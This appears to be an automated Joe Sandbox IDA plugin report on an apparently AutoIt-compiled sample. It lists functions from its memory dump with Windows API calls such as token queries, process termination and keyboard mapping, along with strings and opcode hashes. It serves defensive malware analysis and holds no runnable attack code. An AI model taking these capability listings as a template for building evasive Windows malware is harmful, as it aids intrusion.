Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 2e67ee31d0503f69c58cce62be35fddaf1fb7d4ca7e04f3dde46d75cc4bc46e6
Instruction ID: c700ea6b01064e9919f16a5fb9776e078c16199387447ae754e3d45e9a4e4170
Opcode Fuzzy Hash: 2e67ee31d0503f69c58cce62be35fddaf1fb7d4ca7e04f3dde46d75cc4bc46e6
Instruction Fuzzy Hash: 0231B272508305AFD721DF55D849FABBBE9FF88314F000919F5899B191D730EA08CB92

Function 0032E0B5 Relevance: 9.1, APIs: 6, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0032E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0032E120
SysAllocString.OLEAUT32(00000000), ref: 0032E123
SysAllocString.OLEAUT32 ref: 0032E144
SysFreeString.OLEAUT32 ref: 0032E14D
SysAllocString.OLEAUT32(?), ref: 0032E175

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$Free
String ID:
API String ID: 1313759350-0
Opcode ID: aa927bbfab48c3472438afd7b48061eb470d285e375078636e974b885e343a2e
Instruction ID: 523a636a23a417dbd60337d5eb7a24516a87ce35c0994c506496b75760986125
Opcode Fuzzy Hash: aa927bbfab48c3472438afd7b48061eb470d285e375078636e974b885e343a2e
Instruction Fuzzy Hash: 3121A471200218AFDB119FA9DC89CAB77ECEB09760B008135F914CB2A0DB70EC418B60

Function 0033ED8E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 002D9997: __itow.LIBCMT ref: 002D99C2
Part of subcall function 002D9997: __swprintf.LIBCMT ref: 002D9A0C

Part of subcall function 002EFEC6: _wcscpy.LIBCMT ref: 002EFEE9

_wcstok.LIBCMT ref: 0033EEFF
_wcscpy.LIBCMT ref: 0033EF8E
_memset.LIBCMT ref: 0033EFC1

Strings

X, xrefs: 0033EFFE

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 3c506e03367b284d179e6a111fcb9be43d7d0e464e550b471d06291f72f514e8
Instruction ID: ed129926e5b366579da1f38cc307aa5be9ba42135123366dc3880e35f74288d7
Opcode Fuzzy Hash: 3c506e03367b284d179e6a111fcb9be43d7d0e464e550b471d06291f72f514e8
Instruction Fuzzy Hash: 0BC18D719187409FC725EF24C881A6AB7E4BF84310F05496EF8999B3A2DB70ED55CF82

Function 00328D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003285F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00328608
Part of subcall function 003285F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00328612
Part of subcall function 003285F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00328621
Part of subcall function 003285F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00328628
Part of subcall function 003285F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0032863E

GetLengthSid.ADVAPI32(?,00000000,00328977), ref: 00328DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00328DB8
RtlAllocateHeap.NTDLL(00000000), ref: 00328DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00328DD8
GetProcessHeap.KERNEL32(00000000,00000000,00328977), ref: 00328DEC
HeapFree.KERNEL32(00000000), ref: 00328DF3

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 169236558-0
Opcode ID: 58565c301d603ba2f6e0e9781ac3185cb4afb3a0f2ac01df7f48ffbf5d667029
Instruction ID: 3bd9cb372ce22a0b7c253b0fd635dc214d6f49f3a881c4a8f184eb19df8b4a31
Opcode Fuzzy Hash: 58565c301d603ba2f6e0e9781ac3185cb4afb3a0f2ac01df7f48ffbf5d667029
Instruction Fuzzy Hash: 9711B171502615FFDB129F64EC09BAE776DEF55316F148029E84597260CB31A908CBA0

Function 0035C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 002D12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002D134D
Part of subcall function 002D12F3: SelectObject.GDI32(?,00000000), ref: 002D135C
Part of subcall function 002D12F3: BeginPath.GDI32(?), ref: 002D1373
Part of subcall function 002D12F3: SelectObject.GDI32(?,00000000), ref: 002D139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0035C1C4
LineTo.GDI32(00000000,00000003,?), ref: 0035C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0035C1E6
LineTo.GDI32(00000000,00000000,?), ref: 0035C1F6
EndPath.GDI32(00000000), ref: 0035C206
StrokePath.GDI32(00000000), ref: 0035C216

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 84e604037cb1f524c6278424fcf11c26fffd3f6362bf7e58dab226784cb3bc2b
Instruction ID: 7c2875c8db27839a945633b11f2d8a7df8ca660f570faf5b0ae92a51c37ef785
Opcode Fuzzy Hash: 84e604037cb1f524c6278424fcf11c26fffd3f6362bf7e58dab226784cb3bc2b
Instruction Fuzzy Hash: F1111E7640024CBFDF129F91DC48E9A7FADEF04355F048021BD18461B1D7729E55DBA0

Function 002F03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 002F03D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 002F03DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 002F03E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 002F03F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 002F03F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 002F0401

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 6e2572e63a7ddc97802a20212d71dd61abb7d9a18f0c731f74a9e5acf0559165
Instruction ID: 21b3d25b76ed73a41ba8032c02ccf0019b052637872329bd3101afb4724e9c19
Opcode Fuzzy Hash: 6e2572e63a7ddc97802a20212d71dd61abb7d9a18f0c731f74a9e5acf0559165
Instruction Fuzzy Hash: F5016CB09017597DE3009F5A8C85B52FFE8FF19354F00411BA15C47941C7F5A864CBE5

Function 0033568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0033569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003356B1
GetWindowThreadProcessId.USER32(?,?), ref: 003356C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003356CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003356D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003356E0

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: d1fcfaf4a8210b9fde04b06bd8c7146d4ff5816ca4bde07f569c8e0201081c48
Instruction ID: 888b7c22f1d7730727a0d7654996eef54f4e158fdeda49b33cdb3b0d1973d096
Opcode Fuzzy Hash: d1fcfaf4a8210b9fde04b06bd8c7146d4ff5816ca4bde07f569c8e0201081c48
Instruction Fuzzy Hash: 42F01D32241658BFE7225BA2DC0EEAB7B7CEBC6B12F000169FA04D207096A11A0186B5

Function 003374D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 003374E5
RtlEnterCriticalSection.NTDLL(?), ref: 003374F6
TerminateThread.KERNEL32(00000000,000001F6,?,002E1044,?,?), ref: 00337503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,002E1044,?,?), ref: 00337510

Part of subcall function 00336ED7: CloseHandle.KERNEL32(00000000,?,0033751D,?,002E1044,?,?), ref: 00336EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00337523
RtlLeaveCriticalSection.NTDLL(?), ref: 0033752A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: fbc4dc0cceac12b65fc2ecc8bf19b48688ee2dfda8b7171e97d36b056b858459
Instruction ID: 716825533d5440ada5a46c06f7653f3dc4f20ed792ea6b9c89df3a907c7b6623
Opcode Fuzzy Hash: fbc4dc0cceac12b65fc2ecc8bf19b48688ee2dfda8b7171e97d36b056b858459
Instruction Fuzzy Hash: 0CF03ABA141712AFEB132B64ED8CAEB773EAF45303F010931F202954B1CB755901CB90

Function 00348902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00348928
CharUpperBuffW.USER32(?,?), ref: 00348A37
VariantClear.OLEAUT32(?), ref: 00348BAF

Part of subcall function 00337804: VariantInit.OLEAUT32(00000000), ref: 00337844
Part of subcall function 00337804: VariantCopy.OLEAUT32(00000000,?), ref: 0033784D
Part of subcall function 00337804: VariantClear.OLEAUT32(00000000), ref: 00337859

Strings

Incorrect Parameter format, xrefs: 00348960, 00348B22
AUTOIT.ERROR, xrefs: 00348A3D

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 4bf58d9eb4c933c837ffa24c3520ef47d147ece6c520d283e698cdf1eb23eaa4
Instruction ID: 86909b7a605c80c586bc53bd1f98b661ec0b64373771b5915ea7693a986e18db
Opcode Fuzzy Hash: 4bf58d9eb4c933c837ffa24c3520ef47d147ece6c520d283e698cdf1eb23eaa4
Instruction Fuzzy Hash: 5C917C756087019FC711EF28C48496EBBE8EF89354F04896EF89A8B361DB31ED45CB52

Function 00332F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002EFEC6: _wcscpy.LIBCMT ref: 002EFEE9

_memset.LIBCMT ref: 00333077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003330A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00333159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00333187

Strings

0, xrefs: 00333063

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: aee7785100efecfced95e6862ab4a862b53b9dd87e307700f3c109a0dff29136
Instruction ID: e9a5a92c2f8512af40aaefaae8df640c51e0ab8c3a9a2674ec001f3438914bcc
Opcode Fuzzy Hash: aee7785100efecfced95e6862ab4a862b53b9dd87e307700f3c109a0dff29136
Instruction Fuzzy Hash: 9051D671A193009FD717AF24C88566BB7E8EF45350F058A2DF896D31A1DB70CE448B92

Function 00332C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00332CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00332CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00332D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00396890,00000000), ref: 00332D5A

Strings

0, xrefs: 00332CA4

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 6f2c5f724ab6f7fd1d91301fbe51f5378a4a0889445ba6ccbfce3637746d6a2a
Instruction ID: e457959dea90f686fedb901a4493b556a8d5ab3d35c431c74032c8ba0af94fb0
Opcode Fuzzy Hash: 6f2c5f724ab6f7fd1d91301fbe51f5378a4a0889445ba6ccbfce3637746d6a2a
Instruction Fuzzy Hash: 644191302043019FD722DF24C885B5BBBE8FF85320F15466EF9659B2A1DB70E904CB92

Function 0034DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0034DAD9

Part of subcall function 002D79AB: _memmove.LIBCMT ref: 002D79F9

Strings

stdcall, xrefs: 0034DB5B
winapi, xrefs: 0034DB4A
none, xrefs: 0034DBB4
cdecl, xrefs: 0034DB30

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 1396cacf6c5014eec9c2d628745e13cb2060bcc0bed7c20a818b58c9889bc3c8
Instruction ID: 704da609a552dfb30fe4af1a5d62305de3e32f89387672348cc8f35e75c93e23
Opcode Fuzzy Hash: 1396cacf6c5014eec9c2d628745e13cb2060bcc0bed7c20a818b58c9889bc3c8
Instruction Fuzzy Hash: 2F318D7051461AAFCF11EF54C8819FEB3F4FF05310B108A6AE866AB791DB71AD15CB80

Function 00329372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D7F41: _memmove.LIBCMT ref: 002D7F82

Part of subcall function 0032B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0032B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003293F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00329409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00329439

Part of subcall function 002D7D2C: _memmove.LIBCMT ref: 002D7D66

Strings

ListBox, xrefs: 003293B5
ComboBox, xrefs: 00329380

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 84f056c5abdfc21f8be7ff51e66f2e2af44578f1b9bf90664ab7158c951d03d7
Instruction ID: 461bc8304948000d6a6ef895ca2e59a169b1ed38ed5b6dae43628218f0b064ed
Opcode Fuzzy Hash: 84f056c5abdfc21f8be7ff51e66f2e2af44578f1b9bf90664ab7158c951d03d7
Instruction Fuzzy Hash: 9F21E471900214BEDB16AB71EC85EFFB7ACDF05350F14812AF925972E1DB350D1A9A10

Function 00356656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 002D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002D1D73
Part of subcall function 002D1D35: GetStockObject.GDI32(00000011), ref: 002D1D87
Part of subcall function 002D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 002D1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003566D0
LoadLibraryW.KERNEL32(?), ref: 003566D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003566EC
DestroyWindow.USER32(?), ref: 003566F4

Strings

SysAnimate32, xrefs: 003566AB

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 561196c2cc0ee90998715388f92699135b32f65e4ec13dfcfcc61cca425e451b
Instruction ID: edc9f8108eb47456d12cb1476f648d8f28e9540d58716c8970f46778dd84cbce
Opcode Fuzzy Hash: 561196c2cc0ee90998715388f92699135b32f65e4ec13dfcfcc61cca425e451b
Instruction Fuzzy Hash: 7E21CD71200206AFEF128F64EC82EBB77ADEB1932AF910229FD10931B0C771CC559B60

Function 0033703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 0033705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00337091
GetStdHandle.KERNEL32(0000000C), ref: 003370A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003370DD

Strings

nul, xrefs: 003370D8

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
